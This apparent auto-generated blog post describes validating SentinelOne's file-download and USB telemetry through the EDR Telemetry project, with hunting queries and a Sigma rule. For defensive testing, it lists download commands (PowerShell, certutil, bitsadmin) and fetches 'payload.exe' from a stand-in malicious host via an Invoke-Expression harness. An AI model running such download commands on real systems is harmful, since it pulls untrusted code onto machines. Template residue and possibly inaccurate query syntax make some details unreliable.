Listen to this Post
Introduction:
Endpoint Detection and Response (EDR) platforms are only as powerful as the telemetry they expose. While many vendors restrict raw event data behind proprietary detection algorithms, the EDR Telemetry project independently validates which products truly provide unfiltered visibility. The recent merger of Pull Request 200 now confirms that SentinelOne Singularity Endpoint correctly reports File Downloaded events with provenance—tying file creation to the specific process and download URL—alongside USB Mount and Unmount telemetry, setting a new standard for transparency in incident response.
Learning Objectives:
- Understand how to validate EDR telemetry coverage using the EDR Telemetry project’s testing framework.
- Learn to hunt for file download provenance and USB device activity within SentinelOne’s event search.
- Build custom detection logic leveraging enhanced telemetry fields for advanced threat hunting.
You Should Know:
- Validate EDR Telemetry With the Telemetry Generator Tool
The EDR Telemetry project provides a purpose‑built Telemetry Generator Tool that security teams can use to empirically test what an EDR actually records. This tool simulates a range of attacker behaviors—file downloads, process injections, USB insertions—and logs which events the EDR captures. The validation for PR 200 was performed on Windows 11 21H2 with SentinelOne Singularity Endpoint version 26.1. To replicate this validation in your own environment:
Step‑by‑step guide:
1. Clone the EDR Telemetry repository:
git clone https://github.com/tsale/EDR-Telemetry.git cd EDR-Telemetry
2. Run the telemetry generator for file downloads:
Simulate a file download from a remote URL powershell -c "Invoke-WebRequest -Uri 'https://example.com/sample.exe' -OutFile '%TEMP%\sample.exe'"
After execution, check SentinelOne’s Event Search for an event with category File Downloaded. The telemetry should include:
– `process.name` (e.g., powershell.exe)
– `process.cmdline`
– `file.path` (where the file landed)
– `src.process.url` or equivalent download URL field.
3. Simulate USB device events:
- Mount: Insert any USB mass storage device.
- Unmount: Safely remove the device.
In SentinelOne Event Search, filter for `Event Type: USB Device Mount` and USB Device Unmount. PR 200 upgraded these from `Via EnablingTelemetry` to a full `Yes` status, meaning they are now reliably captured by default.
4. Automate validation across multiple test cases
Use the project’s Python framework to run the complete validation suite:
python telemetry_validator.py --edr sentinelone --tests file_download,usb_mount
- Hunt File Download Provenance in SentinelOne Event Search
The most valuable enhancement in PR 200 is the ability to tie a file creation event back to the specific process and the exact download URL. This provenance is critical for incident responders because it turns an isolated file event into a full kill‑chain artifact.
Step‑by‑step guide for threat hunting:
1. Access SentinelOne Event Search
Navigate to `Investigations → Event Search` in the SentinelOne console.
2. Query for file downloads with URL provenance:
Use the following query syntax to find downloads where the source URL is recorded:
Event Type = "File Downloaded" AND Event Data contains "http"
3. Extract the full process lineage:
Look for these fields in the event JSON:
– `process.parentImagePath` – what launched the downloading process
– `process.imagePath` – the process that performed the download
– `process.cmdLine` – full command line arguments
– `file.url` or `download.url` – the remote source URL
4. Build a hunting rule for anomalous downloads:
Create a custom detection rule that triggers when:
- A download occurs from a non‑standard process (e.g.,
wscript.exe,regsvr32.exe) - The download URL points to a suspicious TLD or IP
- The downloaded file is executed within 5 minutes of landing on disk
5. Example KQL query to surface malicious downloads:
let SuspiciousProcesses = dynamic(["wscript.exe", "cscript.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe"]); Event | where EventType == "File Downloaded" | where ProcessName in (SuspiciousProcesses) | project Timestamp, ComputerName, ProcessName, ProcessCommandLine, FileName, DownloadURL | order by Timestamp desc
- Monitor USB Device Activity for Insider Risk and Data Exfiltration
USB events are often overlooked but remain a primary vector for data exfiltration and malware introduction (e.g., BadUSB, LNK payloads). With SentinelOne now reliably reporting both mount and unmount events, security teams can build a complete audit trail of removable media usage.
Step‑by‑step guide to building a USB monitoring pipeline:
1. Verify USB telemetry is active:
Insert a test USB drive and run the following in SentinelOne Event Search:
Event Type in ("USB Device Mount", "USB Device Unmount")
| summarize by ComputerName, EventType, Timestamp
2. Create an alert for first‑time USB usage:
For high‑security environments, build a detection that triggers when a user mounts a USB device for the first time on a given endpoint:
let FirstSeenUSB = Event | where EventType == "USB Device Mount" | summarize FirstMount=min(Timestamp) by ComputerName, UserName; Event | where EventType == "USB Device Mount" | join kind=inner FirstSeenUSB on ComputerName, UserName | where Timestamp == FirstMount | project Timestamp, ComputerName, UserName, DeviceID
3. Correlate USB mounts with file writes:
After a USB mount, monitor for file copy operations to the device. Use this sequence to detect data staging:
– USB mount event
– Followed by `File Created` events on the USB drive path (e.g., E:\)
– Optional: large file copies or archives (ZIP, RAR)
- Windows command to log USB history for baseline comparison:
If your EDR lacks historical USB data, use PowerShell to query the local registry:Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\" | Select-Object FriendlyName, Mfg, Service
5. Automated response:
Configure a SentinelOne automation workflow that isolates an endpoint upon detection of:
– Mass storage device mount
– Followed by copy of sensitive file extensions (.docx, .xlsx, .pdf)
- Compare EDR Telemetry Across Vendors Using the EDR‑Telemetry Project
The EDR Telemetry project is a vendor‑neutral initiative that evaluates what raw data EDRs actually generate versus what they claim. The project’s website hosts a side‑by‑side comparison matrix covering Sysmon and all major EDR products.
Step‑by‑step guide to using the comparison matrix:
1. Visit the official website:
2. Navigate to the comparison table:
Filter by event categories such as:
- Process creation (with command line)
- Network connections (source/destination IP, port)
- File writes (with originating process)
- Registry modifications
- USB device events
3. Interpret the ratings:
- Yes = telemetry available by default
- Via EnablingTelemetry = requires configuration to surface
- No = not available at agent level
- Via Detection = only visible when a detection triggers (post‑mortem limitation)
4. Use the data for procurement decisions:
When evaluating EDR vendors, reference the matrix to ask pointed questions like:
– “Why does your product not report file download URLs when SentinelOne does?”
– “What specific configuration changes are required to enable USB mount events?”
5. Build Custom Detections With Enhanced Telemetry
Enhanced telemetry enables detection engineering teams to write precise, low‑false‑positive rules that catch real attacker tradecraft without drowning the SOC in noise.
Step‑by‑step guide:
1. Map telemetry to MITRE ATT&CK:
– `File Downloaded` (T1105 – Ingress Tool Transfer)
– `USB Device Mount` (T1091 – Replication Through Removable Media, T1200 – Hardware Additions)
2. Write a Sigma rule for suspicious downloads:
title: Suspicious File Download via Unusual Process status: experimental logsource: product: sentinelone service: endpoint detection: selection: EventType: 'File Downloaded' Image: - '\wscript.exe' - '\cscript.exe' - '\regsvr32.exe' - '\mshta.exe' condition: selection
- Deploy the rule via SentinelOne’s custom detection engine:
– Go to `Threats → Custom Detection Rules`
– Import the Sigma rule (SentinelOne supports Sigma translation)
– Set severity and response actions (e.g., isolate endpoint, kill process)
4. Test the rule using the telemetry generator:
This should trigger your custom rule powershell -c "Invoke-WebRequest -Uri 'https://malicious.example/payload.exe' -OutFile '%TEMP%\payload.exe'"
- Windows Commands to Simulate File Downloads and USB Events for Validation
To continuously test that your EDR telemetry remains intact (e.g., after updates or policy changes), use the following commands to generate realistic test events.
File download simulation:
PowerShell download powershell -c "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/tsale/EDR-Telemetry/main/README.md' -OutFile '%TEMP%\edr_test.txt'" Certutil download (commonly abused by malware) certutil -urlcache -f https://raw.githubusercontent.com/tsale/EDR-Telemetry/main/README.md %TEMP%\edr_test_certutil.txt BITSAdmin download (evasion technique) bitsadmin /transfer mydownload /download /priority high https://example.com/file.dat %TEMP%\file.dat
USB event simulation:
Enumerate currently connected USB devices (no write required) Get-WmiObject -Class Win32_USBHub Log a fake USB mount to the Windows Event Log (for testing log forwarding) Write-EventLog -LogName System -Source "Microsoft-Windows-DriverFrameworks-UserMode" -EventId 2100 -Message "USB device mounted"
Automated test harness:
Full test suite for EDR telemetry validation
$tests = @(
@{ Name = "PowerShell Download"; Command = "powershell -c <code>"Invoke-WebRequest -Uri 'https://example.com/test.exe' -OutFile '%TEMP%\test.exe'</code>"" },
@{ Name = "Certutil Download"; Command = "certutil -urlcache -f https://example.com/test.exe %TEMP%\test_certutil.exe" },
@{ Name = "USB Mount Simulation"; Command = 'Write-EventLog -LogName System -Source "Microsoft-Windows-DriverFrameworks-UserMode" -EventId 2100 -Message "USB test mount"' }
)
foreach ($test in $tests) {
Write-Host "Running: $($test.Name)" -ForegroundColor Cyan
Invoke-Expression $test.Command
Start-Sleep -Seconds 2
}
What Undercode Say:
The EDR Telemetry project forces vendor accountability by publishing hard data on what telemetry is actually available—not what marketing promises. Kostas T.’s emphasis on “vendor optics” cuts through the noise: if an agent collects the data but hides it behind a detection engine, responders cannot use it for proactive hunting or custom correlation. SentinelOne deserves credit for surfacing file download provenance, a notoriously difficult artifact that many EDRs still cannot produce reliably at the agent level.
Key Takeaway 1: Raw telemetry is a strategic asset for defenders—unfiltered access to process lineage, network connections, and file events enables detection engineering that vendor‑supplied rules cannot match.
Key Takeaway 2: The USB telemetry upgrade closes a common visibility gap. Insider threats and hardware‑based attacks often rely on removable media, and having mount/unmount events by default turns a blind spot into an auditable trail.
Expected Output:
Introduction:
Endpoint Detection and Response (EDR) platforms are only as powerful as the telemetry they expose. While many vendors restrict raw event data behind proprietary detection algorithms, the EDR Telemetry project independently validates which products truly provide unfiltered visibility. The recent merger of Pull Request 200 now confirms that SentinelOne Singularity Endpoint correctly reports File Downloaded events with provenance—tying file creation to the specific process and download URL—alongside USB Mount and Unmount telemetry, setting a new standard for transparency in incident response.
What Undercode Say:
- Raw telemetry is a strategic asset for defenders—unfiltered access to process lineage, network connections, and file events enables detection engineering that vendor‑supplied rules cannot match.
- The USB telemetry upgrade closes a common visibility gap. Insider threats and hardware‑based attacks often rely on removable media, and having mount/unmount events by default turns a blind spot into an auditable trail.
Prediction:
- -1 Vendor response will split: Expect leading EDR vendors to follow SentinelOne’s lead and publish more raw telemetry, while laggards will continue to hide data behind “detection‑only” models to obscure telemetry gaps, creating a two‑tier market where transparency becomes a competitive differentiator.
- +1 Community‑driven telemetry standards will emerge: Projects like EDR Telemetry will evolve into de‑facto certification benchmarks, with SOC teams refusing to renew contracts for products that consistently fail telemetry validation tests.
- -1 Some vendors will respond with legal threats: As the EDR Telemetry project grows in influence, vendors with poor telemetry scores may resort to cease‑and‑desist letters or licensing restrictions to suppress unfavorable comparisons, testing the project’s legal and financial resilience.
- +1 Increased demand for telemetry validation tools: Security consultancies will build commercial services around EDR telemetry auditing, helping enterprises empirically test their deployed agents and enforce telemetry SLAs in procurement contracts.
- +1 Better incident response outcomes: With file download provenance and USB events widely available, the average time to map a file artifact back to its source URL and parent process will drop from hours to seconds, dramatically accelerating breach investigations.
▶️ Related Video (72% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Kostastsale Update – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
